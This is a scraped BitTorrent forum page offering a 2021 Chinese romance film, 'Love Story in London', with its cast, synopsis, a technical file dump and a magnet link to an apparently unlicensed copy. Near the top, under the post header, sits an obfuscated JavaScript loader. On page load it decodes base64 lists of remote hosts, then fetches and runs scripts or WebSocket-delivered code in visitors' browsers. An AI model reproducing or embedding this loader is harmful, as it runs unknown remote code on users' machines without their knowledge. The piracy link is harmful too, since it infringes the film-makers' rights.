岁月忽已暮[国语音轨/繁体字幕].Love.Story.in.London.2021.WEB-DL.1080p.迅雷下载 1.80GB

版主小s 27天前 218

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

岁月忽已暮[国语音轨/繁体字幕].Love.Story.in.London.2021.WEB-DL.1080p.迅雷下载 1.80GB

◎译 名 岁月忽已暮 / Passage of My Youth / Love Story in London

◎年 代 2021

◎产 地 中国大陆

◎类 别 剧情 / 爱情

◎语 言 汉语普通话

◎上映日期 2021-06-22(中国大陆网络)

◎IMDb链接 https://www.imdb.com/title/tt5957694/

◎豆瓣评分 3.3/10 (3286人评价)

◎豆瓣链接 https://movie.douban.com/subject/26703946/

◎片 长 97分钟

◎导 演 秦小珍 Janet Chun (id:1274236)

◎编 剧 王芸 Yun Wang (id:1322670)

饶俊 Jun Rao (id:1355314)

◎演 员 张子枫 Zifeng Zhang (id:1274254)

姜潮 Chao Jiang (id:1312694)

宋威龙 Weilong Song (id:1353488)

赵多娜 Duo-na Zhao (id:1320408)

薛卉葳 Huiwei Xue (id:1409323)

荣梓杉 Zishan Rong (id:1352321)

薛博文 Bowen Xue (id:1414501)

◎标 签 张子枫 / 青春 / 宋威龙 / 青春回忆 / 电影 / 绿亦歌 / 书改 / 姜潮

◎简 介

《岁月忽已暮》原著小说讲述了学霸之间在美国留学期间,发生的种种让人温暖和流泪的故事,从不同类型的留学生入手,讲述了不同性格的男生女生在留学期间的不同经历,贴近生活,被无数留学生喜爱。最励志暗恋故事,最温暖学霸题材,倾力打造最励志学霸纯美爱情。一经出版人气十分之高,几度登上销量排行榜。

  1. General

  2. Unique ID : 233780923335006009296156820005533371154 (0xAFE0916CE326AC18DF530F8750BDCB12)

  3. Complete name : Love.Story.in.London.2021.WEB-DL.1080p.H265.AAC-Dave.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 1.80 GiB

  7. Duration : 1 h 36 min

  8. Overall bit rate : 2 655 kb/s

  9. Encoded date : UTC 2021-06-25 13:28:20

  10. Writing application : mkvmerge v19.0.0 ('Brave Captain') 64-bit

  11. Writing library : libebml v1.3.5 + libmatroska v1.4.8


  12. Video

  13. ID : 1

  14. Format : HEVC

  15. Format/Info : High Efficiency Video Coding

  16. Format profile : [email protected]@Main

  17. Codec ID : V_MPEGH/ISO/HEVC

  18. Duration : 1 h 36 min

  19. Bit rate : 2 462 kb/s

  20. Width : 1 920 pixels

  21. Height : 808 pixels

  22. Display aspect ratio : 2.40:1

  23. Frame rate mode : Constant

  24. Frame rate : 24.000 FPS

  25. Color space : YUV

  26. Chroma subsampling : 4:2:0

  27. Bit depth : 8 bits

  28. Bits/(Pixel*Frame) : 0.066

  29. Stream size : 1.67 GiB (93%)

  30. Default : Yes

  31. Forced : No


  32. Audio

  33. ID : 2

  34. Format : AAC LC

  35. Format/Info : Advanced Audio Codec Low Complexity

  36. Codec ID : A_AAC-2

  37. Duration : 1 h 36 min

  38. Bit rate : 192 kb/s

  39. Channel(s) : 2 channels

  40. Channel layout : L R

  41. Sampling rate : 44.1 kHz

  42. Frame rate : 43.066 FPS (1024 SPF)

  43. Compression mode : Lossy

  44. Stream size : 132 MiB (7%)

  45. Title : 国语

  46. Language : Chinese

  47. Default : Yes

  48. Forced : No


  49. Text #1

  50. ID : 3

  51. Format : UTF-8

  52. Codec ID : S_TEXT/UTF8

  53. Codec ID/Info : UTF-8 Plain Text

  54. Duration : 1 h 34 min

  55. Bit rate : 38 b/s

  56. Count of elements : 1358

  57. Stream size : 27.0 KiB (0%)

  58. Title : 简体中文

  59. Language : Chinese

  60. Default : Yes

  61. Forced : No


  62. Text #2

  63. ID : 4

  64. Format : UTF-8

  65. Codec ID : S_TEXT/UTF8

  66. Codec ID/Info : UTF-8 Plain Text

  67. Duration : 1 h 34 min

  68. Bit rate : 38 b/s

  69. Count of elements : 1358

  70. Stream size : 27.0 KiB (0%)

  71. Title : 繁体中文

  72. Language : Chinese

  73. Default : No

  74. Forced : No


  75. Text #3

  76. ID : 5

  77. Format : UTF-8

  78. Codec ID : S_TEXT/UTF8

  79. Codec ID/Info : UTF-8 Plain Text

  80. Duration : 1 h 34 min

  81. Bit rate : 48 b/s

  82. Count of elements : 1323

  83. Stream size : 33.3 KiB (0%)

  84. Title : 英语

  85. Language : English

  86. Default : No

  87. Forced : No


  88. Text #4

  89. ID : 6

  90. Format : UTF-8

  91. Codec ID : S_TEXT/UTF8

  92. Codec ID/Info : UTF-8 Plain Text

  93. Duration : 1 h 35 min

  94. Bit rate : 52 b/s

  95. Count of elements : 1310

  96. Stream size : 37.0 KiB (0%)

  97. Title : 韩语

  98. Language : Korean

  99. Default : No

  100. Forced : No


  101. Text #5

  102. ID : 7

  103. Format : UTF-8

  104. Codec ID : S_TEXT/UTF8

  105. Codec ID/Info : UTF-8 Plain Text

  106. Duration : 1 h 35 min

  107. Bit rate : 109 b/s

  108. Count of elements : 1307

  109. Stream size : 77.1 KiB (0%)

  110. Title : 泰语

  111. Language : Thai

  112. Default : No

  113. Forced : No


  114. Text #6

  115. ID : 8

  116. Format : UTF-8

  117. Codec ID : S_TEXT/UTF8

  118. Codec ID/Info : UTF-8 Plain Text

  119. Duration : 1 h 35 min

  120. Bit rate : 48 b/s

  121. Count of elements : 1306

  122. Stream size : 34.3 KiB (0%)

  123. Title : 马来语

  124. Language : Malay

  125. Default : No

  126. Forced : No


  127. Text #7

  128. ID : 9

  129. Format : UTF-8

  130. Codec ID : S_TEXT/UTF8

  131. Codec ID/Info : UTF-8 Plain Text

  132. Duration : 1 h 35 min

  133. Bit rate : 63 b/s

  134. Count of elements : 1307

  135. Stream size : 44.8 KiB (0%)

  136. Title : 越南语

  137. Language : Vietnamese

  138. Default : No

  139. Forced : No


  140. Text #8

  141. ID : 10

  142. Format : UTF-8

  143. Codec ID : S_TEXT/UTF8

  144. Codec ID/Info : UTF-8 Plain Text

  145. Duration : 1 h 35 min

  146. Bit rate : 42 b/s

  147. Count of elements : 1307

  148. Stream size : 30.2 KiB (0%)

  149. Title : 印尼语

  150. Language : Indonesian

  151. Default : No

  152. Forced : No


  153. Text #9

  154. ID : 11

  155. Format : UTF-8

  156. Codec ID : S_TEXT/UTF8

  157. Codec ID/Info : UTF-8 Plain Text

  158. Duration : 1 h 35 min

  159. Bit rate : 42 b/s

  160. Count of elements : 1307

  161. Stream size : 29.7 KiB (0%)

  162. Title : 西班牙语

  163. Language : Spanish

  164. Default : No

  165. Forced : No


  166. Text #10

  167. ID : 12

  168. Format : UTF-8

  169. Codec ID : S_TEXT/UTF8

  170. Codec ID/Info : UTF-8 Plain Text

  171. Duration : 1 h 35 min

  172. Bit rate : 68 b/s

  173. Count of elements : 1307

  174. Stream size : 48.4 KiB (0%)

  175. Title : 阿拉伯语

  176. Language : Arabic

  177. Default : No

  178. Forced : No


TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:9781B68D97037CD60FA6352D266BA676465E2A6E
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回